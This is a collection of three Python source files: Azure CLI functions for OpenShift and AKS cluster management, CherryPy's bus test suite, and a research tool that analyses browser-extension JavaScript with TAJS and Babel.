def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
NetworkProfile = cmd.get_models('NetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
if location is None:
location = get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(
identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(
vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(
compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or
managed_cluster.identity.type.casefold() == "userassigned"))
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_object_id = cluster.identity_profile["kubeletidentity"].object_id
_ensure_aks_acr(cmd,
assignee=kubelet_identity_object_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id,
is_service_principal=False)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cmd, cluster_identity_object_id, scope):
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cmd, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise UnauthorizedError('Could not grant Managed Identity Operator '
'permission to cluster identity at scope {}'.format(scope))
|
test_bus.py | """Publish-subscribe bus tests."""
# pylint: disable=redefined-outer-name
import os
import sys
import threading
import time
import unittest.mock
import pytest
from cherrypy.process import wspbus
CI_ON_MACOS = bool(os.getenv('CI')) and sys.platform == 'darwin'
msg = 'Listener %d on channel %s: %s.' # pylint: disable=invalid-name
@pytest.fixture
def bus():
"""Return a wspbus instance."""
return wspbus.Bus()
@pytest.fixture
def log_tracker(bus):
"""Return an instance of bus log tracker."""
class LogTracker: # pylint: disable=too-few-public-methods
"""Bus log tracker."""
log_entries = []
def __init__(self, bus):
def logit(msg, level): # pylint: disable=unused-argument
self.log_entries.append(msg)
bus.subscribe('log', logit)
return LogTracker(bus)
@pytest.fixture
def listener():
"""Return an instance of bus response tracker."""
class Listner: # pylint: disable=too-few-public-methods
"""Bus handler return value tracker."""
responses = []
def get_listener(self, channel, index):
"""Return an argument tracking listener."""
def listener(arg=None):
self.responses.append(msg % (index, channel, arg))
return listener
return Listner()
def test_builtin_channels(bus, listener):
"""Test that built-in channels trigger corresponding listeners."""
expected = []
for channel in bus.listeners:
for index, priority in enumerate([100, 50, 0, 51]):
bus.subscribe(
channel,
listener.get_listener(channel, index),
priority,
)
for channel in bus.listeners:
bus.publish(channel)
expected.extend([msg % (i, channel, None) for i in (2, 1, 3, 0)])
bus.publish(channel, arg=79347)
expected.extend([msg % (i, channel, 79347) for i in (2, 1, 3, 0)])
assert listener.responses == expected
def test_custom_channels(bus, listener):
"""Test that custom pub-sub channels work as built-in ones."""
expected = []
custom_listeners = ('hugh', 'louis', 'dewey')
for channel in custom_listeners:
for index, priority in enumerate([None, 10, 60, 40]):
bus.subscribe(
channel,
listener.get_listener(channel, index),
priority,
)
for channel in custom_listeners:
bus.publish(channel, 'ah so')
expected.extend(msg % (i, channel, 'ah so') for i in (1, 3, 0, 2))
bus.publish(channel)
expected.extend(msg % (i, channel, None) for i in (1, 3, 0, 2))
assert listener.responses == expected
def test_listener_errors(bus, listener):
"""Test that unhandled exceptions raise channel failures."""
expected = []
channels = [c for c in bus.listeners if c != 'log']
for channel in channels:
bus.subscribe(channel, listener.get_listener(channel, 1))
# This will break since the lambda takes no args.
bus.subscribe(channel, lambda: None, priority=20)
for channel in channels:
with pytest.raises(wspbus.ChannelFailures):
bus.publish(channel, 123)
expected.append(msg % (1, channel, 123))
assert listener.responses == expected
def test_start(bus, listener, log_tracker):
"""Test that bus start sequence calls all listeners."""
num = 3
for index in range(num):
bus.subscribe('start', listener.get_listener('start', index))
bus.start()
try:
# The start method MUST call all 'start' listeners.
assert (
set(listener.responses) ==
set(msg % (i, 'start', None) for i in range(num)))
# The start method MUST move the state to STARTED
# (or EXITING, if errors occur)
assert bus.state == bus.states.STARTED
# The start method MUST log its states.
assert log_tracker.log_entries == ['Bus STARTING', 'Bus STARTED']
finally:
# Exit so the atexit handler doesn't complain.
bus.exit()
def test_stop(bus, listener, log_tracker):
"""Test that bus stop sequence calls all listeners."""
num = 3
for index in range(num):
bus.subscribe('stop', listener.get_listener('stop', index))
bus.stop()
# The stop method MUST call all 'stop' listeners.
assert (set(listener.responses) ==
set(msg % (i, 'stop', None) for i in range(num)))
# The stop method MUST move the state to STOPPED
assert bus.state == bus.states.STOPPED
# The stop method MUST log its states.
assert log_tracker.log_entries == ['Bus STOPPING', 'Bus STOPPED']
def test_graceful(bus, listener, log_tracker):
"""Test that bus graceful state triggers all listeners."""
num = 3
for index in range(num):
bus.subscribe('graceful', listener.get_listener('graceful', index))
bus.graceful()
# The graceful method MUST call all 'graceful' listeners.
assert (
set(listener.responses) ==
set(msg % (i, 'graceful', None) for i in range(num)))
# The graceful method MUST log its states.
assert log_tracker.log_entries == ['Bus graceful']
def test_exit(bus, listener, log_tracker):
"""Test that bus exit sequence is correct."""
num = 3
for index in range(num):
bus.subscribe('stop', listener.get_listener('stop', index))
bus.subscribe('exit', listener.get_listener('exit', index))
bus.exit()
# The exit method MUST call all 'stop' listeners,
# and then all 'exit' listeners.
assert (set(listener.responses) ==
set([msg % (i, 'stop', None) for i in range(num)] +
[msg % (i, 'exit', None) for i in range(num)]))
# The exit method MUST move the state to EXITING
assert bus.state == bus.states.EXITING
# The exit method MUST log its states.
assert (log_tracker.log_entries ==
['Bus STOPPING', 'Bus STOPPED', 'Bus EXITING', 'Bus EXITED'])
def test_wait(bus):
"""Test that bus wait awaits for states."""
def f(method): # pylint: disable=invalid-name
time.sleep(0.2)
getattr(bus, method)()
flow = [
('start', [bus.states.STARTED]),
('stop', [bus.states.STOPPED]),
('start', [bus.states.STARTING, bus.states.STARTED]),
('exit', [bus.states.EXITING]),
]
for method, states in flow:
threading.Thread(target=f, args=(method,)).start()
bus.wait(states)
# The wait method MUST wait for the given state(s).
assert bus.state in states, 'State %r not in %r' % (bus.state, states)
@pytest.mark.xfail(CI_ON_MACOS, reason='continuous integration on macOS fails')
def test_wait_publishes_periodically(bus):
"""Test that wait publishes each tick."""
callback = unittest.mock.MagicMock()
bus.subscribe('main', callback)
def set_start():
time.sleep(0.05)
bus.start()
threading.Thread(target=set_start).start()
bus.wait(bus.states.STARTED, interval=0.01, channel='main')
assert callback.call_count > 3
def test_block(bus, log_tracker):
"""Test that bus block waits for exiting."""
def f(): # pylint: disable=invalid-name
time.sleep(0.2)
bus.exit()
def g(): # pylint: disable=invalid-name
time.sleep(0.4)
threading.Thread(target=f).start()
threading.Thread(target=g).start()
threads = [t for t in threading.enumerate() if not t.daemon]
assert len(threads) == 3
bus.block()
# The block method MUST wait for the EXITING state.
assert bus.state == bus.states.EXITING
# The block method MUST wait for ALL non-main, non-daemon threads to
# finish.
threads = [t for t in threading.enumerate() if not t.daemon]
assert len(threads) == 1
# The last message will mention an indeterminable thread name; ignore
# it
expected_bus_messages = [
'Bus STOPPING',
'Bus STOPPED',
'Bus EXITING',
'Bus EXITED',
'Waiting for child threads to terminate...',
]
bus_msg_num = len(expected_bus_messages)
# If the last message mentions an indeterminable thread name then ignore it
assert log_tracker.log_entries[:bus_msg_num] == expected_bus_messages
assert len(log_tracker.log_entries[bus_msg_num:]) <= 1, (
'No more than one extra log line with the thread name expected'
)
def test_start_with_callback(bus):
"""Test that callback fires on bus start."""
try:
events = []
def f(*args, **kwargs): # pylint: disable=invalid-name
events.append(('f', args, kwargs))
def g(): # pylint: disable=invalid-name
events.append('g')
bus.subscribe('start', g)
bus.start_with_callback(f, (1, 3, 5), {'foo': 'bar'})
# Give wait() time to run f()
time.sleep(0.2)
# The callback method MUST wait for the STARTED state.
assert bus.state == bus.states.STARTED
# The callback method MUST run after all start methods.
assert events == ['g', ('f', (1, 3, 5), {'foo': 'bar'})]
finally:
bus.exit()
def test_log(bus, log_tracker):
"""Test that bus messages and errors are logged."""
assert log_tracker.log_entries == []
# Try a normal message.
expected = []
for msg_ in ["O mah darlin'"] * 3 + ['Clementiiiiiiiine']:
bus.log(msg_)
expected.append(msg_)
assert log_tracker.log_entries == expected
# Try an error message
try:
foo
except NameError:
bus.log('You are lost and gone forever', traceback=True)
lastmsg = log_tracker.log_entries[-1]
assert 'Traceback' in lastmsg and 'NameError' in lastmsg, (
'Last log message %r did not contain '
'the expected traceback.' % lastmsg
)
else:
pytest.fail('NameError was not raised as expected.')
|
CloakJS.py | import sys
from os.path import isfile, isdir, join, abspath, splitext, basename, exists, dirname, relpath
from os import makedirs, remove as removefile
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from queue import Queue, Empty
from cloakx import Extension
from cloakx.CloakBase import CloakBase
from cloakx.CloakHTML import CloakHTML
import cssutils
import re
from bs4 import BeautifulSoup
from logging import CRITICAL as CRITICAL_LOG_LEVEL
from cloakx.utils import multi_open
from urllib.parse import urlencode, quote_plus
from time import sleep
from shutil import rmtree
import distutils
from distutils import dir_util
# from slimit import ast
# from slimit.parser import Parser
# from slimit.visitors import nodevisitor
# from esprima import parseScript
from pprint import PrettyPrinter
from collections import defaultdict
import json
import pprint
from shutil import copyfile
import hashlib
HTML_TEMPLATE_HEAD = "<html><body>\n"
HTML_TEMPLATE_TAIL = "</body></html>\n"
CEX_HTML_DIR = "cex_html"
TAJS_LOC = join("..", "tajs-all.jar")
TEMP_DIR = join(dirname(__file__),"temp")
pp = PrettyPrinter(indent=2)
class CloakJS(CloakBase):
@staticmethod
def fn_filter(fn):
return fn.endswith('.js') and isfile(fn)
def __init__(self, extension):
super().__init__()
self.ext = extension # type: Extension
self.variable_regex = re.compile(self.ident_pattern, re.IGNORECASE)
cssutils.log.setLevel(CRITICAL_LOG_LEVEL)
self._js_fns = []
def clean_up_js(self):
raise Exception("-- clean_up_js is deprecated")
print("Beautifying")
processlist = []
for bfile in self._js_fns:
cmd = ["js-beautify", "--replace", bfile]
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, close_fds=True, bufsize=1)
# print(cmd)
processlist.append(proc)
for proc in processlist:
proc.wait()
stdout, stderr = proc.communicate()
if proc.returncode != 0:
print("!!!! beautification failed???? ")
print(stdout)
print(stderr)
exit(1283)
print("Beautification completed...")
print("Converting to ES2015")
cmd = ['npx', 'babel-cli', '--plugins', 'transform-object-rest-spread', '--presets=es2015-without-strict', self.ext.get_path,
'--out-file', 'temp-babel.js']
print(cmd)
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, close_fds=True, bufsize=1)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
print(stdout)
self.ext.write_to_results("b")
else:
distutils.dir_util.copy_tree(TEMP_DIR + "/", self.ext.get_path)
print("Conversion completed...")
def build_unified_html(self):
if exists(TEMP_DIR):
rmtree(TEMP_DIR)
makedirs(TEMP_DIR)
self._js_fns = self.ext.get_filtered_filenames(CloakJS.fn_filter)
self.clean_up_js()
script_tags = ""
for fn in self._js_fns:
good_fn = quote_plus(join("..", relpath(fn)))
print (good_fn)
script_tags = script_tags + "\t<script src='%s'></script>\n" % good_fn
# todo: replace with write out to file
# write new css out to file
# with open('style_new.css', 'wb') as f:
# f.write(parser.cssText)
self.htmlfn = join(dirname(__file__), CEX_HTML_DIR, self.ext.getappid() + ".html")
self.datafn = join(dirname(__file__), CEX_HTML_DIR, self.ext.getappid() + ".data")
htmlout = HTML_TEMPLATE_HEAD + script_tags + HTML_TEMPLATE_TAIL
open(self.htmlfn, "w+").write(htmlout)
def easy_find(self, id_map):
found = False
# problem, we want all the times
varpattern = re.compile("(^[.]?[ ])")
h = "[0-9a-f]"
unicode = "\\\\{h}{1,6}(\\r\\n|[ \\t\\r\\n\\f])?".replace("{h}", h)
escape = "({unicode}|\\\\[^\\r\\n\\f0-9a-f])".replace("{unicode}", unicode)
nonascii = "[\\240-\\377]"
nmchar = "([_A-Za-z0-9-]|{nonascii}|{escape})".replace("{nonascii}", nonascii).replace("{escape}", escape)
nmstart = "([_A-Za-z]|{nonascii}|{escape})".replace("{nonascii}", nonascii).replace("{escape}", escape)
ident = "-?{nmstart}{nmchar}*".replace("{nmstart}", nmstart).replace("{nmchar}", nmchar)
varpattern = re.compile(ident)
def find_vals(file_to_parse, strs_to_find):
print ("strs_to_find" + str(strs_to_find))
# returns file_cnt {'foundvar': [col1, col2, etc] }
file_cnts = {}
# print("var " + node.identifier.value + " value to >> " + node.initializer.value + " <<")
for line_index, line in enumerate(file_to_parse, 1):
for match_obj in varpattern.finditer(line):
# find all id values in file and check agaisnt strs_to_find, if found then append to list for var
if match_obj.group() in strs_to_find:
var_found = match_obj.group()
if var_found in file_cnts:
file_cnts[match_obj.group()].append(line_index)
else:
file_cnts[match_obj.group()] = [line_index]
#print (str(line_index) + " " + match_obj.group())
return file_cnts
all_cnts = {}
for fn in self._js_fns:
vars_found = find_vals(open(fn), id_map)
if vars_found:
all_cnts[fn] = vars_found
if all_cnts:
pp.pprint(all_cnts)
json.dump(all_cnts, open(self.datafn, "w+"))
return all_cnts
# if False:
# try:
# jsdata=""
# tree = parseScript(jsdata)
#
# #tree = parser.parse(jsdata)
#
# for node in nodevisitor.visit(tree):
#
# cnt = 0
# if isinstance(node, ast.VarDecl):
#
# if node.initializer is not None and type(node.initializer) is ast.String:
# cnt = find_vals(node.identifier.value, id_map)
# if cnt > 0:
# all_cnts[node.identifier.value] += cnt
# found = True
# print ("var " + node.identifier.value + ' = ' + node.initializer.value + " cnt=%d"%cnt )
#
# if isinstance(node, ast.Assign):
# if type(node.right) is ast.String:
# cnt = find_vals(node.right.value, id_map)
# if cnt > 0:
# all_cnts[node.right.value] += cnt
# found = True
# print("var " + node.left.value + " = " + node.right.value + " " + " cnt=%d" % cnt)
# #node.right.value = match_replace(node.right.value, str_to_find, replace)
#
# if type(node) is ast.String:
# cnt = find_vals(node.value, id_map)
# if cnt > 0:
# all_cnts[node.value] += cnt
# found = True
# print("var " + node.value + " = " + " <<" + " cnt=%d" % cnt )
#
# #print(str(type(node)) + " " + str(vars(node)))
#
# except SyntaxError as ser:
# print (ser)
# exit(929)
# #parse Failed
#
# return all_cnts
# # print (ex)
#print(tree.to_ecma())
def extract_js(self,data):
script_out = ""
data = unquote(data)
data = data.replace("<script", "</script><script")
data += "</script>"
soup = BeautifulSoup(data, 'html.parser')
for script in soup.find_all("script"):
hasSource = False
if script.has_attr("src") and script['src'] is not None:
hasSource = True
# print("SCRIPT!!!{}".format(script))
if script.text is not None and len(script.text) > 5:
script_out += script.text + "\n"
script_out = script_out.replace("!!empty!!", "")
if len(script_out) > 5 and hasSource:
print(data)
if len(script_out.replace("\n", "").strip()) > 5:
return script_out
else:
return ""
def prepare_js(self):
#print("Beautifying")
cmd = ["js-beautify", "--replace", "temp.js"]
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, close_fds=True, bufsize=1)
# print(cmd)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
print(stdout)
print(stderr)
return {"Error:": "Beautification FAILED", "output": repr(stdout), "err": repr(stderr)}
#print("Beautification completed...")
#print("Converting to ES2015")
cmd = ['./node_modules/.bin/babel', '--plugins', 'transform-object-rest-spread', '--presets=es2015-without-strict', "temp.js",
'--out-file', 'temp_converted.js']
#print(cmd)
try:
pass
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, close_fds=True, bufsize=1)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
return {"Error:": "Babel failed to convert ", "output": repr(stdout)}
copyfile("temp_converted.js", "temp.js")
removefile("temp_converted.js")
except Exception as err:
return {"Error:": "Babel failed to convert ", "output": repr(stdout)}
#print("Conversion completed...")
return {"msg": "Preparation of JS completed successfully"}
def analyze_js(self, search_str, js_fn):
if exists("temp.js.json"):
removefile("temp.js.json")
TAJS_LOC = "../tajs-most.jar"
cmd = ["timeout", "450", "java", "-Xmx8128M", "-jar", TAJS_LOC, "temp.js",
"-ignore-if", "-analysis-limitations-warn-only", "-propagate-dead-flow",
"-dom", "-uneval", "-determinacy", "-no-polymorphic",
"-no-messages", "-quiet", "-memory-usage", "-console-model", "-timing",
"-ignore-unreachable", "-no-object-sensitivity", "-no-control-sensitivity",
"-searchFor", search_str, "-searchType", "ID",
"-unsound", "-ignore-missing-native-models"]
#print("Executing Cmd {}".format(cmd))
proc = Popen(cmd, stdout=PIPE, stderr=PIPE, bufsize=1)
parsed = ""
stdout, stderr = proc.communicate()
# print (stdout)
if proc.returncode != 0:
str_stdout = ""
rtn_msg = {}
if proc.returncode == 124:
error_msg = self.ext.getappid() + "|" + js_fn + "|Timedout processing JS file"
rtn_msg = {"error": "Timeout", "error_fn": js_fn, "cmd_search_str": search_str}
else:
if len(stdout) > 200:
str_stdout = repr(stdout[0:100]) + "..." + repr(stdout[-100:])
else:
str_stdout = repr(stdout[0:100])
error_msg = self.ext.getappid() + "|" + js_fn + "|OUT:" + "|ERR:" + repr(stderr)
rtn_msg = {"error": "TAJS processing error", "error_fn": js_fn, "cmd_search_str": search_str,
"stdout": repr(str_stdout),
"stderr": repr(stderr)}
open("data/errors", "a").write(error_msg)
print(str_stdout)
print(stderr)
return rtn_msg
else:
if exists("temp.js.json"):
with open("temp.js.json","r") as jf:
tajs_results = json.load(jf)
tajs_results["cmd_search_str"] = search_str
return tajs_results
else:
print(stdout)
print(stderr)
return {"error": "No Results from TAJS", "stdout": repr(stdout[0:100] + "..." + stdout[-100:]),
"stderr": repr(stderr),
"cmd_search_str": search_str}
# exit(85)
def get_json(self, json_path):
results = {}
with open(json_path, "r") as jf:
results = json.load(jf)
return results
def cloak_dropped_inline_scripts(self, droplets, id_map):
search_str = ",".join(list(id_map.keys()))
#print("SEARCH_STR={}".format(search_str))
cloak_results = []
for source_data in droplets:
js = source_data["script"]
hashvalue = source_data["hash"]
print("\tProcessing Inline JS from Droplet {} with hash {}".format(len(js), hashvalue))
open("temp.js", "w").write(js)
prep_results=self.prepare_js()
#print(open("temp.js", "r").read())
# md5 = hashlib.md5()
# md5.update(js.encode("utf-8"))
# hashvalue = md5.hexdigest()
#print("hashvalue={}".format(hashvalue))
js_fn = "droplet_" + hashvalue
analysis_results = self.analyze_js(search_str, js_fn)
analysis_results["prepare_js"] = prep_results
analysis_results["filename"] = js_fn
if not exists("temp.js.json"):
cloak_results.append(analysis_results)
continue
js_str, edited_lines = self.do_replacements(js, id_map)
analysis_results["edited_lines"] = len(edited_lines)
analysis_results["new_js"] = js_str
analysis_results["old_js"] = js
if len(edited_lines) > 0:
analysis_results["hash"] = hashvalue
cloak_results.append(analysis_results)
return cloak_results
def cloak_dropped_wars(self, wars, id_map):
e = self.ext # type: Extension
search_str = ",".join(list(id_map.keys()))
cloak_results = []
for war_fn in wars:
src_js_fn = e.get_path + war_fn
print("\tProcessing {} of size {}".format(src_js_fn, len(src_js_fn)))
if open(src_js_fn).read().find("//Cloaked") > -1:
print("\tSkipping already cloaked js file {}".format(e.get_path + war_fn))
continue
copyfile(src_js_fn, "temp.js")
